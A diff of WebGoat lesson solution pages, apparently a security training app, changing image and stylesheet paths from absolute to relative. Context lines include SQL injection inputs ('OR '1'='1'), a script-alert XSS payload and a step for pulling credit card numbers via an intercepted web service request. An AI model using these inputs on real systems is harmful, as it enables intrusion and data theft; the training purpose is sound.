@ -843,9 +843,9 @@ is Joe.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_17"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square' filled="t" fillcolor="yellow">
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

12
webgoat/main/project/WebContent/lesson_solutions/SqlNumericInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SqlNumericInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SqlNumericInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SqlNumericInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SqlNumericInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SqlNumericInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/SqlNumericInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml">
href="lesson_solutions/SqlNumericInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -638,7 +638,7 @@ query: SELECT * FROM weather_data WHERE station = 101<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<img src = "/WebGoat/lesson_solutions/SqlNumericInjection_files/numericinjection.png" width=350px>
<img src = "lesson_solutions/SqlNumericInjection_files/numericinjection.png" width=350px>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
@ -654,7 +654,7 @@ field-end'></span><![endif]--> Intercepted Request with WebScarab<span style='fo
a list of all stations:<o:p></o:p></span></p>
<img src = "/WebGoat/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png" width=350px>
<img src = "lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png" width=350px>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:

16
webgoat/main/project/WebContent/lesson_solutions/SqlStringInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SqlStringInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SqlStringInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SqlStringInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SqlStringInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SqlStringInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/SqlStringInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/SqlStringInjection_files/colorschememapping.xml">
href="lesson_solutions/SqlStringInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -653,9 +653,9 @@ terminated with single quotes to have a valid SQL Query.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1536" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SqlStringInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/SqlStringInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/SqlStringInjection_files/image005.jpg" v:shapes="Picture_x0020_1536"><![endif]></span></p>
src="lesson_solutions/SqlStringInjection_files/image005.jpg" v:shapes="Picture_x0020_1536"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -679,9 +679,9 @@ last name value: Erwin' OR '1'='1 <o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1537"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SqlStringInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/SqlStringInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/SqlStringInjection_files/image006.jpg" v:shapes="Picture_x0020_1537"><![endif]></span></p>
src="lesson_solutions/SqlStringInjection_files/image006.jpg" v:shapes="Picture_x0020_1537"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

20
webgoat/main/project/WebContent/lesson_solutions/StoredXss.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/StoredXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/StoredXSS_files/editdata.mso">
<link rel=File-List href="lesson_solutions/StoredXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/StoredXSS_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/StoredXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/StoredXSS_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/StoredXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/StoredXSS_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -633,9 +633,9 @@ undesirable page or content.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1339" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/StoredXSS_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/StoredXSS_files/image007.jpg" v:shapes="Picture_x0020_1339"><![endif]></span></p>
src="lesson_solutions/StoredXSS_files/image007.jpg" v:shapes="Picture_x0020_1339"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -659,9 +659,9 @@ box.<br><br></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1340"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/StoredXSS_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/StoredXSS_files/image008.jpg" v:shapes="Picture_x0020_1340"><![endif]></span></p>
src="lesson_solutions/StoredXSS_files/image008.jpg" v:shapes="Picture_x0020_1340"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -675,9 +675,9 @@ field-end'></span><![endif]--> Stored message<span style='font-family:"Arial","s
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1341"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:267.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image005.png" o:title="" cropbottom="4597f"/>
<v:imagedata src="lesson_solutions/StoredXSS_files/image005.png" o:title="" cropbottom="4597f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=357
src="/WebGoat/lesson_solutions/StoredXSS_files/image009.jpg" v:shapes="Picture_x0020_1341"><![endif]></span></p>
src="lesson_solutions/StoredXSS_files/image009.jpg" v:shapes="Picture_x0020_1341"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

20
webgoat/main/project/WebContent/lesson_solutions/ThreadSafetyProblem.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ThreadSafetyProblem_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ThreadSafetyProblem_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/ThreadSafetyProblem_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml">
href="lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -571,9 +571,9 @@ font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapety
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_15" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ThreadSafetyProblem_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image002.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
src="lesson_solutions/ThreadSafetyProblem_files/image002.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -603,10 +603,10 @@ fast on the submit button in the right window and then in the left window.<o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:262.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image003.png" o:title=""
<v:imagedata src="lesson_solutions/ThreadSafetyProblem_files/image003.png" o:title=""
cropbottom="5791f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=350
src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image004.jpg" v:shapes="Picture_x0020_16"><![endif]></span><span
src="lesson_solutions/ThreadSafetyProblem_files/image004.jpg" v:shapes="Picture_x0020_16"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -627,10 +627,10 @@ different user name!<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_35"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:274.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image007.png" o:title=""
<v:imagedata src="lesson_solutions/ThreadSafetyProblem_files/image007.png" o:title=""
cropbottom="3061f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=366
src="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/image009.jpg" v:shapes="Picture_x0020_35"><![endif]></span></p>
src="lesson_solutions/ThreadSafetyProblem_files/image009.jpg" v:shapes="Picture_x0020_35"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

12
webgoat/main/project/WebContent/lesson_solutions/TraceXSS.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/TraceXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/TraceXSS_files/editdata.mso">
<link rel=File-List href="lesson_solutions/TraceXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/TraceXSS_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/TraceXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/TraceXSS_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/TraceXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/TraceXSS_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -658,9 +658,9 @@ document.write(str1);}&lt;/script&gt;<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1370" o:spid="_x0000_i1025" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/TraceXSS_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/TraceXSS_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/TraceXSS_files/image002.jpg" v:shapes="Picture_x0020_1370"><![endif]></span></p>
src="lesson_solutions/TraceXSS_files/image002.jpg" v:shapes="Picture_x0020_1370"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

24
webgoat/main/project/WebContent/lesson_solutions/UncheckedEmail.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/UncheckedEmail_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/UncheckedEmail_files/editdata.mso">
<link rel=File-List href="lesson_solutions/UncheckedEmail_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/UncheckedEmail_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/UncheckedEmail_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/UncheckedEmail_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/UncheckedEmail_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/UncheckedEmail_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -578,9 +578,9 @@ malicious script like &lt;script&gt;alert("XSS")&lt;/script&gt; and click Send!<
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_168" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image002.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
src="lesson_solutions/UncheckedEmail_files/image002.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -598,9 +598,9 @@ field-end'></span><![endif]--> Lesson 5<span style='font-family:"Arial","sans-se
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:270pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image003.png" o:title="" cropbottom="4085f"/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image003.png" o:title="" cropbottom="4085f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=360
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image004.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
src="lesson_solutions/UncheckedEmail_files/image004.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -622,9 +622,9 @@ to <a href="mailto:bill.gates@microsoft.com">bill.gates@microsoft.com</a><o:p></
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_170"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=369
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image006.jpg" v:shapes="Picture_x0020_170"><![endif]></span><span
src="lesson_solutions/UncheckedEmail_files/image006.jpg" v:shapes="Picture_x0020_170"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -642,9 +642,9 @@ address<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_171"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:273.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image007.png" o:title="" cropbottom="3231f"/>
<v:imagedata src="lesson_solutions/UncheckedEmail_files/image007.png" o:title="" cropbottom="3231f"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=365
src="/WebGoat/lesson_solutions/UncheckedEmail_files/image008.jpg" v:shapes="Picture_x0020_171"><![endif]></span><span
src="lesson_solutions/UncheckedEmail_files/image008.jpg" v:shapes="Picture_x0020_171"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

24
webgoat/main/project/WebContent/lesson_solutions/WSDLScanning.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WSDLScanning_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WSDLScanning_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WSDLScanning_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WSDLScanning_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WSDLScanning_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WSDLScanning_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WSDLScanning_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WSDLScanning_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -636,9 +636,9 @@ to get some customer credit numbers.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_23" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image009.jpg" v:shapes="Picture_x0020_23"><![endif]></span></p>
src="lesson_solutions/WSDLScanning_files/image009.jpg" v:shapes="Picture_x0020_23"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -661,9 +661,9 @@ file in a new window. There is an operation getCreditCard.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_24" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image010.jpg" v:shapes="Picture_x0020_24"><![endif]></span><span
src="lesson_solutions/WSDLScanning_files/image010.jpg" v:shapes="Picture_x0020_24"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -677,9 +677,9 @@ request with WebScarab and change the parameter to getCreditCard<o:p></o:p></spa
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_25"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image011.jpg" v:shapes="Picture_x0020_25"><![endif]></span></p>
src="lesson_solutions/WSDLScanning_files/image011.jpg" v:shapes="Picture_x0020_25"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -694,9 +694,9 @@ field-end'></span><![endif]--> WebScarab raw request<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_26"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WSDLScanning_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WSDLScanning_files/image012.jpg" v:shapes="Picture_x0020_26"><![endif]></span></p>
src="lesson_solutions/WSDLScanning_files/image012.jpg" v:shapes="Picture_x0020_26"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

44
webgoat/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie.html
View File

@ -10,8 +10,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -41,9 +41,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml">
href="lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -674,9 +674,9 @@ will always inject your old cookie and not the new cookie.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_596" o:spid="_x0000_i1033" type="#_x0000_t75"
style='width:465pt;height:267.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=620 height=357
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg" v:shapes="Picture_x0020_596"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image019.jpg" v:shapes="Picture_x0020_596"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -691,9 +691,9 @@ requests&quot;<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_597"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:473.25pt;height:273pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=631 height=364
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg" v:shapes="Picture_x0020_597"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image020.jpg" v:shapes="Picture_x0020_597"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
